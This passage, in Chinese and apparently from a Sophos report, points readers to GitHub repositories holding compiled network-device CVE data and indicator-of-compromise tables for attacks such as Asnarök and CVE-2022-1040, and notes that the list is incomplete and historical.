Sophos欢迎对此编译做出贡献或更正，并在必要时选择更新。该数据存放在GitHub仓库：https://github.com/sophoslabs/NetDeviceCVEs。

每次攻击的指标（IOC）表格可在Sophos X-Ops的GitHub上找到，涵盖以下报告中描述的个别攻击：

• CVE-2020-12271（Asnarök）
• CVE-2020-15069（书签功能缓冲区溢出）
• Rootkits和Bootkits（前沿防御遥测）
• Cyberoam账户创建
• CVE-2022-1040（“Personal Panda”）
• 隐蔽活动（定向攻击）
• 隐秘通道（CVE-2022-3236）

注意：这些并不是所有IOC的完整列表，而是着重于防御者可能有能力追踪的主要网络IOC。由于这些活动具有历史性质，需仔细考虑时间框架，并与本报告交叉引用。

https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/